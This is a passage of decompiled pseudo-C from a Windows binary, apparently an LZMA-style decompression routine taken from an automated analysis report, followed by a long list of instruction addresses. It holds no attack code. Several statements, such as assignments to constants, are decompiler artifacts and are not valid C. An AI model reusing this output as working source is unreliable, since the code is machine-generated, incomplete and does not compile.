											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                  0x00406768
                                                  0x00406768
                                                  0x00406768
                                                  0x00406768
                                                  0x0040676e
                                                  0x00406772
                                                  0x00406776
                                                  0x00406780
                                                  0x0040678e
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406aa1
                                                  0x00406aaa
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af8
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406afa
                                                  0x00406afa
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00406baf
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x00406a7d
                                                  0x00406a83
                                                  0x00406a8a
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00000000
                                                  0x00406a95
                                                  0x00406aff
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061cd
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d7
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406232
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627c
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062a6
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062ec
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
